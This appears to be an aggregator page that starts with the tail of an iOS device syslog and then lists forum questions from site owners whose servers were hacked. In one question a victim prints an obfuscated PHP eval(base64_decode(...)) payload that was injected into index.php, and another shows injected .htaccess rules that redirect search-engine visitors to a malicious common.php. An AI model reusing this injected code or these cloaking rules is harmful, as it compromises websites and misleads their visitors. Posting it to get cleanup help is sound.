Feb  4 2012 13:25:16 Apr 8, 2012 10:08:18 PM - configd [14] (Error): WiFi:[355640898.539342]: WiFiManager now available Apr 8, 2012 10:08:18 PM - keybagd [39] (Error): 3e828d98 main: System Keybag loaded Apr 8, 2012 10:08:18 PM - wifiFirmwareLoader [30] (Warning): [    18.268 sec] Found AppleBCMWLANBusInterface; downloading FW.. Apr 8, 2012 10:08:18 PM - wifiFirmwareLoader [30] (Warning): Loading "/usr/share/firmware/wifi/4330b2/bcm94330OlympicUNO3.txt", file size = 778 bytes Apr 8, 2012 10:08:18 PM - wifiFirmwareLoader [30] (Warning): [    18.276 sec] Sending NVRAM, 778 bytes Apr 8, 2012 10:08:18 PM - wifiFirmwareLoader [30] (Warning): Loading "/usr/share/firmware/wifi/4330b2/n94.trx", file size = 192512 bytes Apr 8, 2012 10:08:18 PM - wifiFirmwareLoader [30] (Warning): [    18.300 sec] Sending firmware, 192512 bytes Apr 8, 2012 10:08:18 PM - lockdownd [23] (Error): libMobileGestalt copyEthernetMacAddress: got 00:f4:b9:2f:d9:8f from syscfg Apr 8, 2012 10:08:18 PM - mediaserverd [44] (Notice): 2012-04-08 10:08:18.817015 PM [AirTunes] HAL plugin started Apr 8, 2012 10:08:18 PM - lockdownd [23] (Error): libMobileGestalt createCFStringWithCFData: Cannot convert NULL data to string Apr 8, 2012 10:08:18 PM - lockdownd [23] (Error): libMobileGestalt copyBasebandBoardSnum: Could not convert baseband board snum data to string Apr 8, 2012 10:08:18 PM - lockdownd [23] (Error): libMobileGestalt createCFStringWithCFData: Cannot convert NULL data to string Apr 8, 2012 10:08:18 PM - lockdownd [23] (Error): libMobileGestalt copyWirelessBoardSnum: Could not convert wireless board snum data to string Apr 8, 2012 10:08:18 PM - lockdownd [23] (Notice): 3e828d98 lockstart_local: Build= 9B179 Apr 8, 2012 10:08:18 PM - lockdownd [23] (Notice): 3e828d98 _load_product_type: using Raptor Certs Apr 8, 2012 10:08:17 PM - wifiFirmwareLoader [30] (Warning): [    17.590 sec] wlan AppleUSBHSICDevice found Apr 8, 2012 10:08:17 PM - wifiFirmwareLoader [30] (Warning): [    17.590 sec] WLAN Enumeration attempt 0 / 6: Apr 8, 2012 10:08:17 PM - wifiFirmwareLoader [30] (Warning): [    17.591 sec] Waiting for AppleBCMWLANBusInterface to enumerate... Apr 8, 2012 10:08:16 PM - CommCenter [18] (Notice): MMS thread running Apr 8, 2012 10:08:16 PM - CommCenter [18] (Notice): Communications Center Started. Apr 8, 2012 10:08:16 PM - CommCenter [18] (Notice): STOP LOCATION UPDATE Apr 8, 2012 10:08:16 PM - locationd [28] (Error): WiFi:[355640896.704327]: bootstrap_look_up of WiFiManager server failed Apr 8, 2012 10:08:16 PM - locationd [28] (Error): WiFi:[355640896.705542]: bootstrap_look_up of WiFiManager server failed Apr 8, 2012 10:08:16 PM - locationd [28] (Error): WiFi:[355640896.706648]: bootstrap_look_up of WiFiManager server failed Apr 8, 2012 10:08:16 PM - locationd [28] (Error): WiFi:[355640896.707418]: bootstrap_look_up of WiFiManager server failed Apr 8, 2012 10:08:15 PM - kernel [0] (Debug): bool AppleRGBOUT::power_down_hardware(), RGB_CTRL (0x00000000) clk_down_ready is not set after 60 msecs Apr 8, 2012 10:08:14 PM - lockdownd [23] (Notice): 3e828d98 main: Starting Up Apr 8, 2012 10:08:14 PM - kernel [0] (Debug): IOReturn AppleRGBOUT::set_display_device_gated(uint32_t), 1 Apr 8, 2012 10:08:14 PM - kernel [0] (Debug): virtual void AppleRGBOUT::do_power_state_change(): fSoft: 1 fHard: 1 swapBusy: 1  fController: 0 - 1 Apr 8, 2012 10:08:14 PM - kernel [0] (Debug): bool AppleRGBOUT::power_up_hardware() Apr 8, 2012 10:08:14 PM - kernel [0] (Debug): set_crc_notification_state 0 Apr 8, 2012 10:08:14 PM - kernel [0] (Debug): virtual void AppleRGBOUT::do_power_state_change(): fSoft: 0 fHard: 1 swapBusy: 0  fController: 1 - 0 Apr 8, 2012 10:08:14 PM - kernel [0] (Debug): bool AppleRGBOUT::power_down_hardware() Apr 8, 2012 10:08:14 PM - kernel [0] (Debug): IOReturn IOMobileFramebufferUserClient::set_hotplug_notify(void *, void *) 0x314b3f0d 0xe215600 Apr 8, 2012 10:08:14 PM - kernel [0] (Debug): IOReturn IOMobileFramebufferUserClient::set_hotplug_notify(void *, void *) 0x849d5000 0x876e8828 0x314b3f0d 0xe215600 Apr 8, 2012 10:08:14 PM - kernel [0] (Debug): bool AppleRGBOUT::power_down_hardware(), clock down RGBOUT Apr 8, 2012 10:08:14 PM - SpringBoard [15] (Notice): IOMobileFrameBufferGetMirroringCapability returning -536870201 via kIOMFBConnectMethod_GetMirroringCapability  Apr 8, 2012 10:08:14 PM - backupd [21] (Warning): INFO: Account changed (enabled=0, accountID=159665024) Apr 8, 2012 10:08:13 PM - kernel [0] (Debug): launchd[17] Builtin profile: ptpd (sandbox) Apr 8, 2012 10:08:13 PM - UserEventAgent [12] (Warning): Factory called Apr 8, 2012 10:08:13 PM - configd [14] (Error): WiFi:[355640893.157493]: bootstrap_look_up of WiFiManager server failed Apr 8, 2012 10:08:13 PM - configd [14] (Error): WiFi:[355640893.158197]: bootstrap_look_up of WiFiManager server failed Apr 8, 2012 10:08:13 PM - configd [14] (Error): WiFi:[355640893.158878]: bootstrap_look_up of WiFiManager server failed Apr 8, 2012 10:08:13 PM - UserEventAgent [12] (Notice): (Note ) PIH: MCUEAPlugin initialized. Apr 8, 2012 10:08:13 PM - UserEventAgent [12] (Error): Querying interface Apr 8, 2012 10:08:13 PM - configd [14] (Error): ioctl(SIOCGIFCAP) failed: Device not configured Apr 8, 2012 10:08:13 PM - configd [14] (Error): ioctl(SIOCGIFCAP) failed: Device not configured Apr 8, 2012 10:08:13 PM - configd [14] (Notice): setting hostname to "Petes-iPod" Apr 8, 2012 10:08:13 PM - configd [14] (Notice): network configuration changed. Apr 8, 2012 10:08:13 PM - UserEventAgent [12] (Warning): TRACE: sending {    command = kMBMessageAccountChanged; } Apr 8, 2012 10:08:13 PM - profiled [20] (Notice): (Note ) profiled: Service starting... Apr 8, 2012 10:08:13 PM - profiled [20] (Notice): (Note ) profiled: Performing boot time checks. Apr 8, 2012 10:08:13 PM - profiled [20] (Notice): (Note ) MC: Checking for MDM installation... Apr 8, 2012 10:08:13 PM - profiled [20] (Notice): (Note ) MC: ...finished checking for MDM installation. Apr 8, 2012 10:08:13 PM - profiled [20] (Notice): (Note ) profiled: Checking for new carrier profile... Apr 8, 2012 10:08:13 PM - profiled [20] (Notice): (Note ) profiled: Installing new carrier profile. Apr 8, 2012 10:08:13 PM - profiled [20] (Notice): (Note ) profiled: Carrier profile has already been installed. Apr 8, 2012 10:08:12 PM - com.apple.launchd [1] (Warning): (com.apple.ptpd) The exception server is already claimed! Apr 8, 2012 10:08:12 PM - CLTM [12] (Notice): CLTM: mitigation behavior enabled Apr 8, 2012 10:08:12 PM - CLTM [12] (Notice): CLTM: camera equations enabled Apr 8, 2012 10:08:12 PM - CLTM [12] (Notice): CLTM: thermal monitoring enabled Apr 8, 2012 10:08:12 PM - CLTM [12] (Notice): CLTM: registered for wake notification Apr 8, 2012 10:08:12 PM - CLTM [12] (Notice): CLTM: set decay on sensor 0 to 16384 Apr 8, 2012 10:08:12 PM - CLTM [12] (Notice): CLTM: set decay on sensor 1 to 546 Apr 8, 2012 10:08:12 PM - CLTM [12] (Notice): CLTM: set decay on sensor 2 to 5461 Apr 8, 2012 10:08:12 PM - CLTM [12] (Notice): CLTM: set decay on sensor 3 to 6553 Apr 8, 2012 10:08:12 PM - CLTM [12] (Notice): CLTM: set decay on sensor 4 to 5461 Apr 8, 2012 10:08:12 PM - CLTM [12] (Notice): CLTM: set decay on sensor 5 to 5461 Apr 8, 2012 10:08:12 PM - CLTM [12] (Notice): CLTM: set decay on sensor 6 to 16384 Apr 8, 2012 10:08:12 PM - CLTM [12] (Notice): CLTM: set decay on sensor 9 to 5461 Apr 8, 2012 10:08:12 PM - CLTM [12] (Notice): CLTM: set decay on sensor 10 to 5461 Apr 8, 2012 10:08:12 PM - CLTM [12] (Notice): CLTM: Set AppleARMPerformanceControllerDVDFactor1 dithering level to 101% Apr 8, 2012 10:08:12 PM - CLTM [12] (Notice): CLTM: Set AppleARMPerformanceControllerDVDFactor0 dithering level to 100% Apr 8, 2012 10:08:12 PM - CLTM [12] (Notice): CLTM: Set charge rate index to 0 Apr 8, 2012 10:08:12 PM - CLTM [12] (Notice): CLTM: HID not ready cannot set BL Apr 8, 2012 10:08:12 PM - CLTM [12] (Notice): CLTM: setting thermal status level to 0 (0) [-32768, -32768, -32768, -32768, -32768, -32768, -32768, -32768, -32768, -32768, -32768, -32768, -32768, -32768, -32768] Apr 8, 2012 10:08:12 PM - CLTM [12] (Notice): CLTM: set allowable transmit power limit to 24.000 dBm [-32768, -32768, -32768, -32768, -32768, -32768, -32768, -32768, -32768, -32768, -32768, -32768, -32768, -32768, -32768] Apr 8, 2012 10:08:12 PM - CLTM [12] (Error): CLTM: Could not close relay file Apr 8, 2012 10:08:12 PM - CLTM [12] (Notice): CLTM: thermtgraphrelay is not present

    Read the article

  • Windows Server 2003 Hacked - Files Being Uploaded

    - by jreedinc
    Blank directories are being created on my Windows Server 2003 virtual server with sub directories that are weird (for example: "88ÿ ÿ ÿÿþþ þþ13þ"). It looks like they are uploading bootlegged DVDs and pirated software. All of my bandwidth and file space is being eaten up. Could this be a shared permissions issue? Where should I look to further investigate this? My security permissions for the directory that is being hit are as followed: Administrators - ALL GRANTED IIS_WPG - Read & Execute, List Folder Contents, Read Internet Guest - DENY SYSTEM - ALL GRANTED Users - Read & Execute, List Folder Contents, Read My Event Viewer is showing many Logon/Logoff with NO IP?

    Read the article

  • Could my forms be hacked.

    - by Mike Sandman
    Hi there, I posted a question yesterday, which I intend to get back to today however I wrote some JavaScript as a first line of prevention against XSS. However when testing this on my live server I catch some invalid input as the javascript catches the php section. My form uses post and php isn't in my form items (i haven't typed it in). Could this be picking up the form action or something? I'm baffeled, Any ideas Here is my code, it is triggered on the submit button. function validateForBadNess(){ var theShit = new Array("*","^", "$", "(",")","{", "}","[", "]","\", "|", "'","/","?",",","=","","gt","lt", "<","script","`","´","php"); var tagName = new Array(); tagName[0] = "input"; tagName[1] = "select"; tagName[2] = "textbox"; tagName[3] = "textarea"; for (ms=0;ms // loop through the elements of the form var formItems = document.getElementsByTagName(tagName[ms]); for (var xs=0;xs var thisString = formItems[xs].value; // loop through bad array for (zs in theShit){ //alert(thisString + " " + thisString.indexOf(theShit[zs])) if(thisString.indexOf(theShit[zs]) >= 0){ alert("Sorry but the following character: " + theShit[zs] + " is not permitted. Please omit it from your input.\nIf this is part of your password please contact us to heave your password reset.") return false; } } // loop for formitems } // tagName toop } // original condition }

    Read the article

  • Registry remotley hacked win 7 need help tracking the perp

    - by user577229
    I was writing some .VBS code at thhe office that would allow certain file extensions to be downloaded without a warning dialog on a w7x32 system. The system I was writing this on is in a lab on a segmented subnet. All web access is via a proxy server. The only means of accessing my machine is via the internet or from within the labs MSFT AD domain. While writing and testing my code I found a message of sorts. Upon refresing the registry to verify my code changed a dword, instead the message HELLO was written and visible in regedit where the dword value wass called for. I took a screen shot and proceeded to edit my code. This same weird behavior occurred last time I was writing registry code except on another internal server. I understand that remote registry access exists for windows systems. I will block this immediately once I return to the office. What I want to know is, can I trace who made this connection? How would I do this? I suspect the cause of this is the cause of other "odd" behaviors I'm experiencing at work such as losing control of my input director master control for over an hour and unchanged code that all of a sudden fails for no logical region. These failures occur at funny times, whenver I'm about to give a demonstration of my test code. I know this sounds crazy however knowledge of the registry component makes this believable. Once the registry can be accessed, the entire system is compromised. Any help or sanity checking is appreciated.

    Read the article

  • All PHP files getting hacked

    - by nsearle
    Hey All, Like always, just want to say thank you for all of the help and input in advance. I have a particular site that I am the web developer for and am running into a unique problem. It seems that somehow something is getting into every single PHP file on my site and adding some malware code. I have deleted the code from every page multiple times and changed FTP and DB passwords, but to no avail. The code that is added looks like this - eval(base64_decode(string)) - which the string is 3024 characters. Not sure if anyone else has ran into this problem or if any one has ideas on how I can secure my php code up. Thanks again.

    Read the article

  • PHP: I got hacked...

    - by jun
    I just checked my site it suddenly jumps me to this site: xxxp://www1.re*******3.net/?p=p52dcWpkbG6HjsbIo216h3de0KCfaFbVoKDb2YmHWJjOxaCbkXp%2FWqyopHaYXsiaY2eRaGNpnFPVpJHaotahiaJ0WKrO1c%2Beb1qfnaSZdV%2FXlsndblaWpG9plmGQYWCcW5eakWppWKjKx6ChpqipbmdjpKjEjtDOoKOhY56n1pLWn1%2FZodXN02BdpqmikpVwZWpxZGxpcV%2FVoJajYmJkZ2hwlGGXaVbJkKC0q1eum5qimZxx I found out that in the first line of my index.php file, that looks like this: <?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHR/* Snip */DkxRTI5RUI9QHVucGFjaygndicsc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMTAsMikpOyAgICAgICAkUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCPSRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUJbMV07ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkrPTIrJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQjsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCY4KXsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT1Ac3RycG9zKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsY2hyKDApLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKzE7ICAgICAgfSAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmMTYpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PUBzdHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYyKXsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSs9MjsgICAgICB9ICAgICAgJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz1AZ3ppbmZsYXRlKEBzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSk7ICAgICAgaWYoJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz09PUZBTFNFKXsgICAgICAgJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz0kUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDOyAgICAgIH0gICAgICByZXR1cm4gJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1MzsgICAgIH0gICAgfSAgICBmdW5jdGlvbiBtcm9iaCgkUkU4MkVFOUIxMjFGNzA5ODk1RUY1NEVCQTdGQTZCNzhCKXsgICAgIEhlYWRlcignQ29udGVudC1FbmNvZGluZzogbm9uZScpOyAgICAgJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERT1nemRlY29kZSgkUkU4MkVFOUIxMjFGNzA5ODk1RUY1NEVCQTdGQTZCNzhCKTsgICAgICAgaWYocHJlZ19tYXRjaCgnL1w8XC9ib2R5L3NpJywkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFKSl7ICAgICAgcmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPFwvYm9keVteXD5dKlw+KS9zaScsZ21sKCkuIlxuIi4nJDEnLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpOyAgICAgfWVsc2V7ICAgICAgcmV0dXJuICRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUuZ21sKCk7ICAgICB9ICAgIH0gICAgb2Jfc3RhcnQoJ21yb2JoJyk7ICAgfSAgfQ=="));?> How do I stop this? thanks! UPDATE: What kind of attack is this? is this really xss? No one really knows about my ftp password.

    Read the article

  • htaccess hacked - i've deleted code and file - what next?

    - by user1762595
    My website was hacked recently. I think i've found the code that was added to the htaccess file, deleted it and then added script to prevent the htaccess file being accessed again. I've also deleted the php file that the hacked code refers to (common.php). What do i need to do next? I'm not a programmer or website developer but i really wanted to see if i could fix the problem myself as i've spent quite a few hours trying and don't give up easily. Here is the hacked code that i deleted; <IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_USER_AGENT} (google|yahoo) [OR] RewriteCond %{HTTP_REFERER} (google|yahoo) RewriteCond %{REQUEST_URI} /$ [OR] RewriteCond %{REQUEST_FILENAME} (shtml|html|htm|php|xml|phtml|asp|aspx)$ [NC] RewriteCond %{REQUEST_FILENAME} !common.php RewriteCond /home/httpd/vhosts/bluestardive.com/httpdocs/common.php -f RewriteRule ^.*$ /common.php [L] </IfModule> this code has to stay in the htaccess file as it redirects my url to seo friendly ones or the website errors, but has this code been hacked as well? # Apache search queries statistic module RewriteEngine On AddHandler php5-fastcgi .php .php5 # <contrexx> # <core_modules__alias> RewriteRule ^about-us$ /index.php?page=883 [L,NC] RewriteRule ^ausfluge-und-aktivitaten$ /index.php?page=800 [L,NC] RewriteRule ^bluestardive-news$ /index.php?page=919 [L,NC] RewriteRule ^bookings$ /index.php?page=911 [L,NC] RewriteRule ^diveresort$ /index.php?page=879 [L,NC] RewriteRule ^diving$ /index.php?page=880 [L,NC] RewriteRule ^excursions-and-activities$ /index.php?page=881 [L,NC] RewriteRule ^galerie$ /index.php?section=gallery [L,NC] RewriteRule ^oceannight$ http://www.bluestardive.com/index.php?page=906 [L,NC] RewriteRule ^philosophy$ /index.php?page=846 [L,NC] RewriteRule ^reservation$ /index.php?page=917 [L,NC] RewriteRule ^reservierung$ /index.php?page=918 [L,NC] RewriteRule ^resort$ /index.php?page=798 [L,NC] # </core_modules__alias> # </contrexx> many thanks for any help Claire

    Read the article

  • My Sites Were Hacked. What To Do?

    - by Vad
    I host multiple domains with this very popular hosting provider and I just went into one of my sites and... I see a black page with message "Hacked by...". I checked and all my sites with the provider are showing this same page. Inside of file system I have seen the hacker placed all default.* and index.* files with this message. So the hacker overwrote all index pages, placed new pages and that is under every, I say again, every folder. Cleaning this up will be close to a most horrible job. What to do (right now I am awaiting the restore of files from hosting provider)? How to prevent this? Whom to blame?

    Read the article

  • What is the reason why some websites are hacked? [closed]

    - by adietan63
    I just want to know. What is the reason why some website are hacked? Is it the website itself or is it the web server? I'm so curious about this because i want to develop my website and I just want to know what are the things I need to do to protect my website? Assuming that i will start it from the scratch. Please give me advice or other technical stuff that will open my mind to developed my website that has security features.. Thank you.

    Read the article

  • How Can I Find Out *HOW* My Site Was Hacked? How Do I Find Site Vulnerabilities?

    - by Imageree
    One of my custom developed ASP.NET sites was hacked today: "Hacked By Swan (Please Stop Wars !.. )" It is using ASP.NET and SQL Server 2005 and IIS 6.0 and Windows 2003 server. I am not using Ajax and I think I am using stored procedures everywhere I am connecting to the database so I dont think it is SQL injection. I have now removed the write permission on the folders. How can I find out what they did to hack the site and what to do to prevent it from happening again? The server is up to date with all Windows updates. What they have done is uploading 6 files (index.asp, index.html, index.htm,...) to the main directory for the website. What log files should I upload? I have log files for IIS from this folder: c:\winnt\system32\LogFiles\W3SVC1. I am willing to show it to some of you but don't think it is good to post on the Internet. Anyone willing to take a look at it? I have already searched on Google but the only thing I find there are other sites that have been hacked - I haven't been able to see any discussion about it. I know this is not strictly related to programming but this is still an important thing for programmers and a lot of programmers have been hacked like this.

    Read the article

  • Is my site hacked, or does Google have problems? [duplicate]

    - by Bondye
    Possible Duplicate: Titles in Google results contain spammy prefixes I have a webshop online and I have some problems with redirecting from Google. Case 1 When I Google for my site at google.com in Iron SWR (safe Chrome version) and I click the first link I get the correct page. Case 2 When I Google for my site at google.nl in Iron SWR (safe Chrome version) and I click the first link Google will redirect me to a spam site. Case 3 When I Google for my site in Google Chrome and I click the first link Google will redirect me to a spam site. Case 4 When I Google for my site in FireFox and I click the first link Google will redirect me to a spam site. Case 5 When I Google for my site in Internet Explorer and I click the first link Google will redirect me a page that tells me the site is offline. HELP WHAT TO DO? I checked the .htaccess but this file is correct. I checked the index.php file but this one is also correct. What can I do? Hacked or does Google has trouble?

    Read the article

facebook twitter digg google delicious technorati stumbleupon myspace wordpress linkedin gmail igoogle windows live tumblr viadeo yahoo buzz yahoo mail yahoo bookmarks favorites email print

< Previous Page | 1 2 3 4 5 6 7 8 9 10 11 12  | Next Page >